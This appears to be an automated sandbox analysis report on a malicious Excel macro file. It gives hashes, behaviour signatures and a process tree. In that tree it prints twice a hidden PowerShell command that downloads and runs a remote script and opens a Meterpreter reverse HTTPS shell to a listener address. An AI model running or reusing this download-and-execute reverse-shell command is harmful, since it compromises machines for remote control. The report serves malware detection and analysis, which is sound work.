Analysis
-
max time kernel
19s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
08/07/2024, 21:57
General
-
Target
f329e4b08afc7dca5caa97e88e589f237fc60d0178addb01a769f17691981d55.xls
-
Size
35KB
-
MD5
37c6ff0b9bc51d0fcb452256f18a598b
-
SHA1
53eb945d5f264f9bce3ec8da311544d3aa6d3f4d
-
SHA256
f329e4b08afc7dca5caa97e88e589f237fc60d0178addb01a769f17691981d55
-
SHA512
6c21282c8a5052703299122cd25f03ba1ffccbbdcfe670ae68f001953e246695b1685a37669061a1eb7cd8893776da04f963a1592a4fdbca1e514601ef42a632
-
SSDEEP
768:Ftvo+/zZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ9QCv/1f93:t1k3hbdlylKsgqopeJBWhZFGkE+cL2NO
Malware Config
Extracted
https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
-
Drops file in System32 directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f329e4b08afc7dca5caa97e88e589f237fc60d0178addb01a769f17691981d55.xls1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewscript C:\Users\Public\config.vbs2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD587ad9165900c1699cd0a201fe192ff59
SHA1e3325d8d32baa8c250a43c8110a62e6dd91a2e1c
SHA2568f3bc412af2b605c78cb1126318d831e2975de9ae1211df9f1b8dcf02067dc34
SHA512330fb8bcc2d8d0af4880330023f0ebf970866353d91e59f0ea355ace0add9b98a03a3a247c5252b2fc68e6b6a504be793d3fc314998fee1a935d916d6f443136
-
Filesize
461B
MD5ce52ab154163c511f0efa6a61e22ab64
SHA19f12cc215e15802eddcb02cb5370ef16b21fa3a6
SHA256df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17
SHA512cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
2.9MB
-
Filesize
32KB